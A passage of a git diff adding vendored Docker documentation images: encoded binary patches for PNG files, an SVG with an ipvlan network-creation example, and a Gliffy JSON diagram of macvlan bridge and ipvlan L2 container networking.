z7am3P(0ku(1#X-A4OHIQ%8M^b*rV=_67D2WU1vD4y8B3Z;o;8#LIj7kG+5-x&K+O3 zH8!NdfWP}KlT;&Xo@HjyAn=hiLrmu_sm$A_6N5@p#^a@7n11aWHs$hT3#-@?FCB(x zj8Fn3swk#Zk7YotnXl<$P~Is{!cRoT1jX-4l}(eC$BWIS?URCyWfF|LZ0+a#fAJ;i6MTs z2Q&}r{8_BXkVcz<19BRgENIV zybHBb4)gL)Qb>;N-i`i#D{k_u!9|eNiNu5H{mf|@1K-jqn0m z_1xEkjfz@j{&L|h$U?(v-m&(p9$rsHu892_Yc2@g($tEoe`6EoQ80uiFcnrRsHFuy z`1ekO+)nk8FdibDWB0x45%^w@{$!WtkT?5q2BTnh$-mH!+%}X~bkijH$PS0M#oC{z z==v~Ms~TwhA(`apZZqTa^2DIJDLIAx$V$KB_v~)yQX5);1Eyok`VkvmFiBqhFRpy% zQ+4Z)?GGtpYFvk_8>Ug;x0HbJex+umjl!_4SRf0HzQDKBpa9(RJ*FuoYoE3(inCc# 
z+%Knz9vYVG|FBj$8gf7a-ZB?oA0gaoJD9=T1sXeV`z^%Z8i9Q9pKNqgU9p`Ja$QY+ z2kj`#6k|MRtzno5!Xe0|Y8Wd}EsBX|!aA1; zo+O^W9QW8a#8Il?W+-QS8wfADdFkCioB-boKcPGHGDjrlkY(!|=G#L47oLntB&ad8 zdJfh%-H!`F)_%Rya`|T9Acr2w}sk15+(1H z=E^P#LrFjL-*YYN|3Fhy>)7EA|UOxZ=LwLZUJ;8NyHp6N@5M+40)g1xpq)1b#0CaR41Yb znbX*_ismgYzu4FFOfY%r63M%p>N!iTh`6uuiW@4^gZJk#F1v$8X!JDx;5x(B1aw^B ziv!@%#~}@6r?BJH8Am7P9M|}3rsl54YzxNO@cn5>3Ln`d!;SwRHE21Tk^1x~Pgs*EnrW>_iT99xEcEPiiYM8oqJ9GBrt| zbUs@Lx-}L7tKmRYcontainer1192.168.1.2/24container2192.168.1.3/24pub_net (eth0)DockerHostdockernetworkcreate -dipvlan \--subnet=192.168.1.0/24 \--gateway=192.168.1.1 \-oparent=eth0pub_neteth0192.168.1.0/24NetworkRouter192.168.1.1/24 \ No newline at end of file diff --git a/vendor/github.com/docker/docker/experimental/images/macvlan-bridge-ipvlan-l2.gliffy b/vendor/github.com/docker/docker/experimental/images/macvlan-bridge-ipvlan-l2.gliffy new file mode 100644 index 0000000000..eceec778b7 --- /dev/null +++ b/vendor/github.com/docker/docker/experimental/images/macvlan-bridge-ipvlan-l2.gliffy @@ -0,0 +1 @@ +{"contentType":"application/gliffy+json","version":"1.3","stage":{"background":"#FFFFFF","width":541,"height":352,"nodeIndex":290,"autoFit":true,"exportBorder":false,"gridOn":true,"snapToGrid":false,"drawingGuidesOn":false,"pageBreaksOn":false,"printGridOn":false,"printPaper":"LETTER","printShrinkToFit":false,"printPortrait":true,"maxWidth":5000,"maxHeight":5000,"themeData":{"uid":"com.gliffy.theme.beach_day","name":"Beach 
Day","shape":{"primary":{"strokeWidth":2,"strokeColor":"#00A4DA","fillColor":"#AEE4F4","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#004257"}},"secondary":{"strokeWidth":2,"strokeColor":"#CDB25E","fillColor":"#EACF81","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#332D1A"}},"tertiary":{"strokeWidth":2,"strokeColor":"#FFBE00","fillColor":"#FFF1CB","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#000000"}},"highlight":{"strokeWidth":2,"strokeColor":"#00A4DA","fillColor":"#00A4DA","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#ffffff"}}},"line":{"strokeWidth":2,"strokeColor":"#00A4DA","fillColor":"none","arrowType":2,"interpolationType":"quadratic","cornerRadius":0,"text":{"color":"#002248"}},"text":{"color":"#002248"},"stage":{"color":"#FFFFFF"}},"viewportType":"default","fitBB":{"min":{"x":2,"y":6.5},"max":{"x":541,"y":334.5}},"printModel":{"pageSize":"a4","portrait":false,"fitToOnePage":false,"displayPageBreaks":false},"objects":[{"x":2.0,"y":6.5,"rotation":0.0,"id":288,"width":541.0,"height":22.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":31,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Macvlan Bridge Mode & Ipvlan L2 Mode

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":8.0,"y":177.0,"rotation":0.0,"id":234,"width":252.0,"height":129.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":0,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":2.0,"strokeColor":"#434343","fillColor":"#c5e4fc","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.93,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":16.0,"y":240.0,"rotation":0.0,"id":225,"width":111.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":1,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.73,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[{"x":2.2199999999999993,"y":0.0,"rotation":0.0,"id":235,"width":106.56,"height":45.0,"uid":null,"order":"auto","lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Container #1

eth0

172.16.1.10/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":138.0,"y":240.0,"rotation":0.0,"id":237,"width":111.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":4,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.73,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[{"x":2.2199999999999993,"y":0.0,"rotation":0.0,"id":238,"width":106.56,"height":44.0,"uid":null,"order":6,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Container #2

eth0 172.16.1.11/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":40.0,"y":-26.067047119140625,"rotation":0.0,"id":258,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":7,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":237,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":241,"py":1.0,"px":0.7071067811865476}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[153.5,266.0670471191406],[117.36753236814712,224.06704711914062]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":50.0,"y":-16.067047119140625,"rotation":0.0,"id":259,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":8,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":225,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":241,"py":0.9999999999999996,"px":0.29289321881345254}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[21.5,256.0670471191406],[62.632467631852876,214.0670471191406]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":60.0,"y":-6.067047119140625,"rotation":0.0,"id":260,"width":100.0,"height":100.
0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":9,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":241,"py":0.5,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":246,"py":0.5,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[75.0,180.06704711914062],[215.32345076546227,90.06897143333742]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":3.0,"y":184.5,"rotation":0.0,"id":261,"width":79.0,"height":32.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":10,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Docker

Host #1

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":283.0,"y":177.0,"rotation":0.0,"id":276,"width":252.0,"height":129.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":11,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":2.0,"strokeColor":"#434343","fillColor":"#c5e4fc","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.93,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":291.0,"y":240.0,"rotation":0.0,"id":274,"width":111.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":12,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.73,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[{"x":2.2199999999999993,"y":0.0,"rotation":0.0,"id":275,"width":106.56,"height":45.0,"uid":null,"order":14,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Container #3

eth0

172.16.1.12/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":413.0,"y":240.0,"rotation":0.0,"id":272,"width":111.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":15,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.73,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[{"x":2.2199999999999993,"y":0.0,"rotation":0.0,"id":273,"width":106.56,"height":44.0,"uid":null,"order":17,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Container #4

eth0 172.16.1.13/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":315.0,"y":-26.067047119140625,"rotation":0.0,"id":269,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":18,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":272,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":270,"py":1.0,"px":0.7071067811865476}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[153.5,266.0670471191406],[117.36753236814712,224.06704711914062]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":325.0,"y":-16.067047119140625,"rotation":0.0,"id":268,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":19,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":274,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":270,"py":0.9999999999999996,"px":0.29289321881345254}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[21.5,256.0670471191406],[62.632467631852876,214.0670471191406]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":278.0,"y":184.5,"rotation":0.0,"id":267,"width":79.0,"height":32.0,"uid":"c
om.gliffy.shape.basic.basic_v1.default.text","order":20,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Docker

Host #2

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":70.0,"y":3.932952880859375,"rotation":0.0,"id":278,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":21,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":270,"py":0.5,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":246,"py":0.5,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[340.0,170.06704711914062],[205.32345076546227,80.06897143333742]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":167.32131882292583,"y":39.0019243141968,"rotation":0.0,"id":246,"width":216.0042638850729,"height":90.0,"uid":"com.gliffy.shape.cisco.cisco_v1.storage.cloud","order":22,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.cisco.cisco_v1.storage.cloud","strokeWidth":2.0,"strokeColor":"#333333","fillColor":"#434343","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":356.0,"y":150.0,"rotation":0.0,"id":270,"width":108.0,"height":48.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":23,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#cccccc","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":1.0,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[
{"x":1.8620689655172418,"y":0.0,"rotation":0.0,"id":271,"width":104.27586206896557,"height":42.0,"uid":null,"order":25,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

(Host) eth0

172.16.1.253/24

(IP Optional)

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":81.0,"y":150.0,"rotation":0.0,"id":241,"width":108.0,"height":48.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":26,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#cccccc","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":1.0,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[{"x":1.8620689655172415,"y":0.0,"rotation":0.0,"id":242,"width":104.27586206896555,"height":42.0,"uid":null,"order":28,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

(Host) eth0

172.16.1.254/24

(IP Optional)

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":224.0,"y":64.19999694824219,"rotation":0.0,"id":262,"width":120.00000000000001,"height":32.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":29,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Network Gateway

172.16.1.1/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":307.5,"rotation":0.0,"id":282,"width":541.0,"height":36.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":30,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Containers Attached Directly to Parent Interface. No Bridge Used (Docker0)

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"layers":[{"guid":"9wom3rMkTrb3","order":0,"name":"Layer 0","active":true,"locked":false,"visible":true,"nodeIndex":32}],"shapeStyles":{},"lineStyles":{"global":{"fill":"none","stroke":"#000000","strokeWidth":1,"orthoMode":2}},"textStyles":{"global":{"italic":true,"face":"Arial","size":"20px","color":"#000000","bold":false}}},"metadata":{"title":"untitled","revision":0,"exportBorder":false,"loadPosition":"default","libraries":["com.gliffy.libraries.basic.basic_v1.default","com.gliffy.libraries.flowchart.flowchart_v1.default","com.gliffy.libraries.swimlanes.swimlanes_v1.default","com.gliffy.libraries.images","com.gliffy.libraries.network.network_v4.home","com.gliffy.libraries.network.network_v4.business","com.gliffy.libraries.network.network_v4.rack","com.gliffy.libraries.network.network_v3.home","com.gliffy.libraries.network.network_v3.business","com.gliffy.libraries.network.network_v3.rack"],"lastSerialized":1458124258706,"analyticsProduct":"Confluence"},"embeddedResources":{"index":0,"resources":[]}} \ No newline at end of file diff --git a/vendor/github.com/docker/docker/experimental/images/macvlan-bridge-ipvlan-l2.png b/vendor/github.com/docker/docker/experimental/images/macvlan-bridge-ipvlan-l2.png new file mode 100644 index 0000000000000000000000000000000000000000..13aa4f212d9db346f307dfbe111fd657406bb943 GIT binary patch literal 14527 zcmZ8|1yEek(&pf9gS!px9wfL7?(XjHfe_r?o!}4%?(Xgc5AMNT154iS`)haSR-Kye z`MUe-K7G$Qb?Z)ql7bWpA^{=*06>uji>m+tkZb?|gb6&FFcuiA2}u9| zCuqei$M4-5nwr`%i3Np4vgR^5xmi?p#UH=*mV3XyA4*G0x3#x92gWff1cLwoYwwVe zXz=#-mVViE$?s==*J21!?}^c7DO)2a0KlX5gh}1OzpT$YG814}Y}0%tmN+Aryb)z3 zsT@@gAoG`$lpO2IFpREFRt13lD?iI9=-GG+2moqFC%hy9I;nj{27uocPT1D10075u zO@yRFl7errMnFEDh#5#PPuh?-x?z&dII=d^&poRym>Ga5A8o_}h!g_|nSE(VHt%mQ zPqw6czuO|90az5wa0^O8kUNShYVM8{SpWbzzUn>s&g!NPQdUl24Wmw9x|Dc7tCD5i 
z`~h`8htZ7%KLEg;77+f;xPQ6_tOjVPO#d7)KeD-x!mCj40sbB># zBGK_J+`o&7iG6fe=KSsDW0j8+4tQ zhH*-^spHNug`oyE=L)?pv{pax=*n0-F0Ov#MtGq;M)d`C_0|)mHCU--2WMp&h)U&P zcQv?6T)kMcBJ6c$fMY%x)hr|An5WbgL#Op*Pvno^B*6%cGQulpIp?=Ppr)&ez$$6D z*}MDmX)#sm4Bby&%JvaxP;wzHM8DFF^FHjHwaXuDtd)8S?sxf2d3U>RT&%lJ$$CKm zXh*C8HSbv=U%Mg`XBgyBD%Rl}U!)etqPnI`2p{fA6T+dIgA+kT$S=YKz6gfU{%qvb z7e`jpjWyGn%7K-x9`5=yt$bko+n7@#7IU)OAp}+uF5#D0@BlvI_$(!08p3V=l>$Z3 zlwFz4CPzXyYS1KhRVa3_pd_SxNF|)OT`e>lX_!!Pr15$;eD}>yYE?otTcpveS87|& ztkT$vjWL34w}3#Tgw7O^gpwUU2|(|iPy<+_ncLzhsmGAV&thM_)Q|PylCK^T0QjcK zo)J4y05vSxJZF_EhzlM^A^oT4R?8Dmr zwcQDogw_q@WZCF0mOTbPNpjBRXO@O@nrbl2Vm8jTFDVV77`yjlsDjtincO zM(x$`)?EVqN$)d!m{}ZTC)2AeEw+vI>c6fF??;Ax1Z*Js`7TrxV1fJvHlbX1Hp{=wWxaUkp%r;hrW+LO`2E=(bg%#N+RzoYBK2xv zWVjjX{L3{G28PiMMhX<0`Xnn1r`@t})K`Pv)@qv4v=R5^9oiqikp-o-UU|L*Ja?lK z^~t|nwjE>6J~DcyXdjyY;MzpznqdRM$Q^AYD;i&eSwO;!ow^Zq%U0@9iokAYuN1=0 zgjyk@V*PUkjr8X{l@-*_=Ov5&jCwY{A}H~ahq|QDLtcg)p;~3h3no~JY%&`*vC&7^ z>eEyEgAHMBKM!|f zS^386lj~YFezTObA2o}(5mchyM-Ly|toT6%F z7)_9n2@5gyTM>li#2#N+?(o9x8uvAM9D;G%>ym)K>fPrXn@mRJ#**k+lXkp*hum|c zq-1Zrm(C;xkw(JwzZP&ka;|2lw+qcoTme=rp;XgC*aTN#3s+cEC11-J3o1v9za4Xx~HF`t_^?MsU8C-VhCW<=qT-s%dTMDFKtR?Shvc)nrj6n%d3#Y_z&7J zrn*Ns22|<_(Wc?fCoX+yTbklb3JVSk{~bMgl-KmFC;*#;@%qQDYeOJCLe=MOv&Hw+ zO<(DH8U2Dk^4Basq;cIAD+E;=;f42~rYU3FLb!|ErqsXR$WU_m&VGuc)+^xQrq)=I)A(> z3eq>1S5EZYnb3qc&FEHe!-=MDnrX#aNvg?bf)@Gl85B?bP<6YHD_N=&cfdll0*f672)(R19dd$J@@N{w_z&pMbh5kL5@`Ex& zq&SW}KA<5D|7<)1kw7ZCF3_b&b?Vo#7D!g(=aw2`run#=*WBbN>sO)(Bc-=a0u}hBb$_t3wwW`DS%BKn1z*%{>8}Z zL^-J*dwD-znMzHcwswYp;Xpdcs)spLD?%v%r%!Wm!3~J%y9`ry3lbe=yhWi&noL(O{~pRZ zhF-BaAUy|z^c;yWqTyz(=2#Mc0q>nyb_n^oYH%fyF}#B$-F>b^teXvT)0d6kkIl7z zQ=IXU)dXF)oEt1lrWK3f;E~veRry0233TD7pUIQMkKk268myK!minxp;_1w?wPwNBgq62c=52H1bC>GzD#Q>{GypZ?aN*$R=IJf2|D>8XPCX4HG|$i585Vy$kj zUPg%fSbO5#DUq8|zNayBaW7VF15SxZv&K*w+A#k{w8(fy)U>_#_1o@Auj^W&Une}; z!^!7CPCY#K0Ror^@yBz@1Feq3mD}7}P^iKOFdu5vpq6F2Z#Bit=d8$Z`euV38G8rO zB&WfNKOFBuhr`6eZ{NF{ZqA;<;Qf)La@{W*9qQfT7^7`OhJW}>P`~cZ 
z@Aq?>q)ssj-FYN)y!}~!-kvXw;uyXs3MKs5u$hG1m-zLw?*(o`Qm(S*-J+QMkN4Jg z6;Hd1JBg|2SF7D)zDmEt{alPVl1Q!U=7!5sAuK9pu3&{O8%QegU0`;e=}Zw*tcuQK zl*FhPZvLrri8@W>1H{>pXNY6T@o_2e=8Q~!I2tu175a>nKu5raW~Tk-FR|1mS`}&asn<@r2JsIP(WHGM-CCu+3#EB7cL+5tY`ZAC|;K@PjgQ^CrJS zoSZig&6L68RPw{CZ-?UHBgAtxF`Dskz;p21CwWf^(x7qD@U#L(@t4Nxgj>hvbDw9k zt3Q+;dfN^3`G1g+vFLwE2QT@C-=ed<i+abt)eg^w7Ps@X*{}DCI9dEmxnBdP?5w=jgEL$wSKvEO?o+=B zAu-?zTrBEeJhd2}5X_u+Z^)DiK6uoSR3ioj=sln8YafL*F2>HC{uYyJ79u`EIP<&e z6`zxVV?9zZ_D562P*iO}qr8B)=!DgeJn`m3Mvj%H!uzVap&K>BWMMSDnb5@_=F9ig zXe8{!h78pn3x>z|{vI#MP{epUyBej~V@|07?X~qOiZGKRjrdTPIE=(W@XENha4pF4 z;5*zkK$WHn@-RQ|+-rFI2QL4H9+Yc!J%Z6{l-`Lz!__pVRA15BgkdZe+(Vbr^E)of zX0dK&SY)66l>%;Q$HT#tZ<{Bhb-`WMe7z+ziQeg_WX|EWqwZuk-F6Ip^JEv~#OK$n z&Of6syLejdEuP3#uXY$)Q@OQMCH&*2te)CT)M0!+LukO&^`p@=1stEB_#-plM$TQg zcY1eJTr<{l?u{B)rf8(+UpF2ee5yT3R+n#*g6dD!6;9um24)Q?LJ8Fn(6FBcZ}jow zhEs)_aHuQS@2l*sGA}zWHt!U0lEesoHXiTw+Sf8X6>tuHBJr}iexg64;e+~ag-l91 zY|rjCS*AZ@vBB+dsp^VPWSn$cc}9_%Jz%l<`5EOwNkTB`eE^SyJj{+e9{&6uDnZ~A z%D9hp#9&k1*!F1tdf`3>as2E$d3<3Yn<$uFObQLoyccw((!rC9 zYeaSDtk!>Zm_wn!lsf#f$`*oV?BsMVi}*D-9)_AODWr@>A&1j1%`d`A( zs0rEAdW(%IiXg0?EGB5N*?tcR*z;&JvOLELo7%Tf}W@Ybq7Kz%Rq 